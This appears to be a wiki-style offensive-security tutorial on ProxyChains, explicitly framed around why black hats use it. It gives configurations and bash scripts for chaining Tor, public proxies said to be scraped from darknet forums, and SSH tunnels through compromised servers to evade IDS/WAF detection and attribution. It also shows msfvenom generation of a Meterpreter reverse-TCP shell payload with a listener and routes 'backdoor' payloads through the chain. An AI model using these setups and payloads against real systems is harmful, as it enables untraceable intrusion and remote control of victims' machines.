PROXYCHAINS

FOR EDUCATIONAL PURPOSES ONLY

ProxyChains in Kali Linux is an essential tool for anonymity, evasion, and controlled traffic routing during offensive operations. It acts as a user-space preloader that forces any TCP connection made by a given program to follow a chain of proxies — usually SOCKS4, SOCKS5, or HTTP — without requiring modification to the source code of the target application.

ProxyChains intercepts outgoing TCP connections using LD_PRELOAD, dynamically hooking standard libc functions like connect() and redirecting them through one or more configured proxy servers. This lets you force any application — like nmap, sqlmap, curl, ssh, or even your custom tools — to route through anonymizing services.

Why Black Hats Use ProxyChains

Anonymity & IP Obfuscation Route your traffic through public or private proxies (including Tor), masking your real IP and making attribution difficult. This is particularly important when:
- Fingerprinting a target before active exploitation.
- Connecting to C2 infrastructure.
- Scanning networks where logging and IP tracking are in place.
Bypassing Geo/IP Restrictions Use exit nodes in specific countries to spoof physical locations, avoid IP blocks, or simulate access from within a targeted region.
Evasion of IDS/IPS/WAFs When using distributed proxies, you can evade rate limits, avoid triggering IP-based alerts, and even spread out attack traffic.
Operational Security (OPSEC) Every touchpoint matters. ProxyChains is used to reduce the digital footprint, especially during early-stage reconnaissance or lateral movement across compromised infrastructure.

ProxyChains VS ProxyChains-ng

proxychains (classic): Older, rarely maintained.
proxychains-ng: The improved version, supports dynamic chains and Tor better.

Configuration File

/etc/proxychains.conf

Key Sections

# Options
strict_chain
# or
dynamic_chain

# Proxy list format: type host port
socks5 127.0.0.1 9050    # Example Tor proxy

strict_chain: Forces the use of proxies in the exact order listed.
dynamic_chain: Skips dead proxies; good for stability.
random_chain: Randomizes the order — better for OPSEC if using multiple proxies.

Usage

Using ProxyChains with Nmap (Through Tor)

proxychains nmap -sT -Pn -n --top-ports 20 example.com

Using ProxyChains with Metasploit

proxychains msfconsole

Using ProxyChains with custom payloads

proxychains python3 backdoor.py

Launching browser for deep web access via proxies

proxychains firefox

Limitations and Considerations

Only supports TCP — UDP is untouched (use other tools for UDP obfuscation).
Latency increases — the more proxies, the more delay.
Does not encrypt traffic unless using a proxy type that inherently encrypts (e.g., SOCKS5 with SSL).
Your proxy list is only as good as your OPSEC — public proxies are often monitored or honeypots.

Advanced OPSEC Practices with ProxyChains

Combine with Tor (service tor start) and set socks5 127.0.0.1 9050.
Chain public SOCKS proxies scraped from darknet forums.
Rotate proxies dynamically with custom scripts (e.g., proxychains + cron + torrc reload).
Monitor leak paths — some applications may bypass ProxyChains by resolving DNS outside of it. Use proxy_dns to prevent this.

ProxyChains + Tor + SSH Tunnel + DNS Leak protection Setup

Make sure the essentials are installed

sudo apt update
sudo apt install proxychains4 tor openssh-client net-tools

Proxychains4 is the -ng version

Configure ProxyChains

sudo nano /etc/proxychains.conf

Choose dynamic or strict depending on whether you want stability or strict order

dynamic_chain
#strict_chain
#random_chain

Ensure this is uncommented for DNS leak protection

proxy_dns

Add Tor proxies

socks5 127.0.0.1 9050     # Tor
socks5 127.0.0.1 9051     # Secondary Tor port (optional if you use multiple Tor instances)

Add these if you want to route through multiple external SOCKS proxies

socks5 203.0.113.45 1080
socks5 198.51.100.88 9050

Start Tor service

sudo service tor start

Check if it's listening on 127.0.0.1:9050

netstat -tnlp | grep 9050

Edit the Tor config if needed

sudo nano /etc/tor/torrc

Enable control port for advanced routing as an option

ControlPort 9051
CookieAuthentication 1

Restart Tor

sudo systemctl restart tor

Add SSH Tunneling to open a tunnel through a VPS or compromised server

ssh -f -N -D 1337 user@vps.ip.address

-D 1337: Dynamic port forwarding (SOCKS5)
-f -N: Run in background without executing commands

Add this within /etc/proxychains.conf

socks5 127.0.0.1 1337

Testing the setup

DNS Leak Test

proxychains curl https://dnsleaktest.com

You should see Tor or your SSH host's IP - never your real one

If DNS leaks happen, ensure the /etc/resolv.conf isn't overridden by NetworkManager

sudo chattr +i /etc/resolv.conf

Force it to use 127.0.0.1

nameserver 127.0.0.1

Example Usages

Passive Recon

proxychains curl https://target.site

Enumeration

proxychains nmap -sT -Pn -n --top-ports 20 target.com

Exploitation

proxychains msfconsole

Custom Tools

proxychains python3 yourscript.py

Set up Multiple Tor clients on different ports

tor --SocksPort 9052 --DataDirectory /var/lib/tor2

Then add

socks5 127.0.0.1 9052

Rotate Tor Circuits and rotate Tor Dynamically

torify curl --socks5 127.0.0.1:9050 https://check.torproject.org/

Full-Stack Layered Anonymity

Local Box ➜ Tor ➜ ProxyChains ➜ SSH Tunnel ➜ Tor ➜ Target

Dynamic Public Proxy Scraper + Updater

This script scrapes live SOCKS5 proxies and updates proxychains.conf

#!/bin/bash
# socks_scraper.sh - Pulls live SOCKS5 proxies and updates ProxyChains

TMP_FILE="/tmp/live_socks.txt"
PROXY_CONF="/etc/proxychains.conf"

echo "[*] Scraping live SOCKS5 proxies..."
curl -s https://raw.githubusercontent.com/TheSpeedX/SOCKS-List/master/socks5.txt -o $TMP_FILE

echo "[*] Filtering responsive proxies..."
> /tmp/valid_socks.txt
while read ip; do
    timeout 5 bash -c "</dev/tcp/$(echo $ip | tr ':' ' ')" &>/dev/null && echo "socks5 $ip" >> /tmp/valid_socks.txt
done < $TMP_FILE

echo "[*] Updating ProxyChains config..."
sudo sed -i '/^socks5/d' $PROXY_CONF
sudo cat /tmp/valid_socks.txt | sudo tee -a $PROXY_CONF

echo "[✓] Done. $(wc -l < /tmp/valid_socks.txt) live proxies added."

Rotating Tor Circuit IP Address Automation

(crontab -l 2>/dev/null; echo "*/10 * * * * echo -e 'AUTHENTICATE \"\"\\nSIGNAL NEWNYM\\nQUIT' | nc 127.0.0.1 9051") | crontab -

Rotates the IP Address every 10 minutes

Custom Proxychains Launcher with Randrom Proxy Mode

#!/bin/bash
# proxy_launch.sh - Launches a tool through randomized proxychains

TARGET_CMD=$@
PROXY_CONF="/etc/proxychains.conf"

echo "[*] Shuffling proxy list..."
grep ^socks5 $PROXY_CONF | shuf > /tmp/shuffled_proxies.txt
sudo sed -i '/^socks5/d' $PROXY_CONF
sudo cat /tmp/shuffled_proxies.txt | sudo tee -a $PROXY_CONF

echo "[*] Launching: $TARGET_CMD"
proxychains $TARGET_CMD

Usage

chmod +x proxy_launch.sh
./proxy_launch.sh curl https://icanhazip.com

C2 Integration Concept with Metasploit

You can launch a Meterpreter reverse TCP payload through ProxyChains like so

Generate the Payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > shell.elf

Host Payload served from your hidden service or SSH tunnel

Set up listener with ProxyChains

proxychains msfconsole

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit

Self-Healing Tor + Tunneling Watchdog

#!/bin/bash
# watchdog.sh - Restarts Tor and SSH tunnel if either dies

SSH_PORT=1337

while true; do
    if ! pgrep tor > /dev/null; then
        echo "[!] Tor died, restarting..."
        sudo systemctl start tor
    fi

    if ! netstat -tuln | grep ":$SSH_PORT" > /dev/null; then
        echo "[!] SSH tunnel died, restarting..."
        ssh -f -N -D $SSH_PORT user@host
    fi

    sleep 60
done

PreviousNMAP NextNCAT

Last updated 6 months ago